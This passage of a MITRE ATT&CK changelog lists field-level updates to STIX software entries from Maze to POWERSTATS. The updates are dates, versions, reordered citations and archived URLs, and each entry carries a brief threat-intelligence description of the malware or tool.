| external_references[2]['url'] | https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/ | https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/ |
| x_mitre_version | 1.3 | 2.0 |
| Description |
|---|
| [MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-08-20 14:52:23.369000+00:00 | 2022-07-29 19:48:28.725000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Maze](https://attack.mitre.org/software/S0449) ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-18 23:46:05.071000+00:00 | 2022-01-24 17:01:08.605000+00:00 |
| Description |
|---|
| [Metamorfo](https://attack.mitre.org/software/S0455) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-27 19:32:33.491000+00:00 | 2022-10-18 23:23:55.295000+00:00 |
| external_references[1]['source_name'] | Metamorfo | Casbaneiro |
| external_references[1]['description'] | (Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) | (Citation: ESET Casbaneiro Oct 2019) |
| external_references[2]['source_name'] | Casbaneiro | Metamorfo |
| external_references[2]['description'] | (Citation: ESET Casbaneiro Oct 2019) | (Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) |
| Description |
|---|
| [Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-20 14:25:59.596000+00:00 | 2022-08-03 15:07:11.534000+00:00 |
| x_mitre_version | 1.4 | 1.6 |
| Description |
|---|
| [MirageFox](https://attack.mitre.org/software/S0280) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. (Citation: APT15 Intezer June 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 17:05:26.798000+00:00 | 2022-07-22 18:52:32.764000+00:00 |
| external_references[2]['url'] | https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/ | https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/ |
| Old Description | New Description |
|---|---|
| [Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) in 2012. (Citation: Cylance Dust Storm) | [Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) by 2012.(Citation: Cylance Dust Storm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:16:03.001000+00:00 | 2022-09-30 20:04:42.419000+00:00 |
| description | [Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) in 2012. (Citation: Cylance Dust Storm) | [Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) by 2012.(Citation: Cylance Dust Storm) |
| external_references[1]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[1]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2010 to 2011. (Citation: Cylance Dust Storm) | [Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylance Dust Storm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:16:26.920000+00:00 | 2022-09-30 21:01:41.137000+00:00 |
| description | [Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2010 to 2011. (Citation: Cylance Dust Storm) | [Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylance Dust Storm) |
| external_references[1]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[1]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 16:03:26.871000+00:00 | 2022-07-20 20:09:46.802000+00:00 |
| external_references[2]['url'] | http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf | https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf |
| Description |
|---|
| [Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-21 16:41:34.225000+00:00 | 2022-07-22 18:37:22.182000+00:00 |
| Old Description | New Description |
|---|---|
| [Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019) | [Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes LazyScripter Feb 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-29 20:46:04.658000+00:00 | 2022-04-06 19:49:28.441000+00:00 |
| description | [Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019) | [Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes LazyScripter Feb 2021) |
| external_references[2]['source_name'] | FireEye Maze May 2020 | Cyware Ngrok May 2019 |
| external_references[2]['description'] | Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020. | Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems. Retrieved September 15, 2020. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html | https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44 |
| external_references[3]['source_name'] | Cyware Ngrok May 2019 | MalwareBytes LazyScripter Feb 2021 |
| external_references[3]['description'] | Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems. Retrieved September 15, 2020. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. |
| external_references[3]['url'] | https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44 | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'FireEye Maze May 2020', 'description': 'Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html'} | |
| Description |
|---|
| [Nidiran](https://attack.mitre.org/software/S0118) is a custom backdoor developed and used by [Suckfly](https://attack.mitre.org/groups/G0039). It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-18 15:21:51.702000+00:00 | 2022-04-15 16:27:20.897000+00:00 |
| external_references[1]['description'] | DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. | DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. |
| Description |
|---|
| [NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-23 19:31:47.185000+00:00 | 2022-04-25 14:00:00.188000+00:00 |
| Description |
|---|
| [OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS that was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 20:44:20.719000+00:00 | 2022-10-19 16:35:18.493000+00:00 |
| external_references[2]['source_name'] | Zshlayer | Crossrider |
| external_references[2]['description'] | (Citation: sentinelone shlayer to zshlayer) | (Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018) |
| external_references[3]['source_name'] | Crossrider | Zshlayer |
| external_references[3]['description'] | (Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018) | (Citation: sentinelone shlayer to zshlayer) |
| external_references[4]['url'] | https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/ | https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html |
| external_references[7]['source_name'] | Intego Shlayer Apr 2018 | Malwarebytes Crossrider Apr 2018 |
| external_references[7]['description'] | Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019. | Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019. |
| external_references[7]['url'] | https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/ | https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/ |
| external_references[8]['source_name'] | Malwarebytes Crossrider Apr 2018 | Intego Shlayer Apr 2018 |
| external_references[8]['description'] | Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019. | Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019. |
| external_references[8]['url'] | https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/ | https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/ |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor with several variants that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 01:59:21.279000+00:00 | 2022-01-14 21:53:00.543000+00:00 |
| x_mitre_version | 2.1 | 2.2 |
| Description |
|---|
| [Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan written in the Delphi programming language that has been used by [Nomadic Octopus](https://attack.mitre.org/groups/G0133) to target government organizations in Central Asia since at least 2014.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 02:42:45.953000+00:00 | 2022-04-06 17:15:58.173000+00:00 |
| external_references[2]['source_name'] | Securelist Octopus Oct 2018 | ESET Nomadic Octopus 2018 |
| external_references[2]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018. | Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. |
| external_references[2]['url'] | https://securelist.com/octopus-infested-seas-of-central-asia/88200/ | https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf |
| external_references[3]['source_name'] | Security Affairs DustSquad Oct 2018 | Securelist Octopus Oct 2018 |
| external_references[3]['description'] | Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021. | Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018. |
| external_references[3]['url'] | https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html | https://securelist.com/octopus-infested-seas-of-central-asia/88200/ |
| external_references[4]['source_name'] | ESET Nomadic Octopus 2018 | Security Affairs DustSquad Oct 2018 |
| external_references[4]['description'] | Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. | Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021. |
| external_references[4]['url'] | https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf | https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html |
| Description |
|---|
| [Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 15:04:49.088000+00:00 | 2022-04-19 01:33:33.267000+00:00 |
| external_references[1]['source_name'] | Orz | AIRBREAK |
| external_references[1]['description'] | (Citation: Proofpoint Leviathan Oct 2017) | (Citation: FireEye Periscope March 2018) |
| external_references[2]['source_name'] | AIRBREAK | Orz |
| external_references[2]['description'] | (Citation: FireEye Periscope March 2018) | (Citation: Proofpoint Leviathan Oct 2017) |
| x_mitre_version | 2.1 | 2.2 |
| Old Description | New Description |
|---|---|
| [PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) | [PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two. [PLEAD](https://attack.mitre.org/software/S0435) was observed in use as early as March 2017.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/ | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-04 01:44:16.182000+00:00 | 2022-04-15 11:32:25.173000+00:00 |
| description | [PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) | [PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two. [PLEAD](https://attack.mitre.org/software/S0435) was observed in use as early as March 2017.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) |
| external_references[1]['source_name'] | PLEAD | Trend Micro PLEAD RTLO |
| external_references[1]['description'] | PLEAD derived its name from letters used in backdoor commands in intrusion campaigns.(Citation: Trend Micro PLEAD RTLO) | Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019. |
| external_references[3]['source_name'] | JPCert PLEAD Downloader June 2018 | PLEAD |
| external_references[3]['description'] | Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020. | PLEAD derived its name from letters used in backdoor commands in intrusion campaigns.(Citation: Trend Micro PLEAD RTLO)(Citation: TrendMicro BlackTech June 2017) |
| external_references[4]['source_name'] | JPCert TSCookie March 2018 | JPCert PLEAD Downloader June 2018 |
| external_references[4]['description'] | Tomonaga, S.. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020. | Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020. |
| external_references[5]['source_name'] | Trend Micro PLEAD RTLO | JPCert TSCookie March 2018 |
| external_references[5]['description'] | Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019. | Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020. |
| external_references[5]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/ | https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html |
| x_mitre_version | 1.0 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Hannah Simes, BT Security | |
| Description |
|---|
| [POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 17:17:35.369000+00:00 | 2022-07-20 20:06:44.707000+00:00 |
| external_references[3]['source_name'] | FireEye FIN7 March 2017 | Cisco DNSMessenger March 2017 |
| external_references[3]['description'] | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. | Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html | http://blog.talosintelligence.com/2017/03/dnsmessenger.html |
| external_references[4]['source_name'] | Cisco DNSMessenger March 2017 | FireEye FIN7 March 2017 |
| external_references[4]['description'] | Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017. | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. |
| external_references[4]['url'] | http://blog.talosintelligence.com/2017/03/dnsmessenger.html | https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html |
| Description |
|---|
| [POWERSTATS](https://attack.mitre.org/software/S0223) is a PowerShell-based first stage backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069). (Citation: Unit 42 MuddyWater Nov 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-23 20:16:28.982000+00:00 | 2022-10-12 19:06:51.405000+00:00 |
| external_references[1]['source_name'] | POWERSTATS | Powermud |
| external_references[1]['description'] | (Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018) | (Citation: Symantec MuddyWater Dec 2018) |
| external_references[2]['source_name'] | Powermud | POWERSTATS |
| external_references[2]['description'] | (Citation: Symantec MuddyWater Dec 2018) | (Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018) |
| external_references[3]['source_name'] | Unit 42 MuddyWater Nov 2017 | ClearSky MuddyWater Nov 2018 |
| external_references[3]['description'] | Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018. | ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018. |
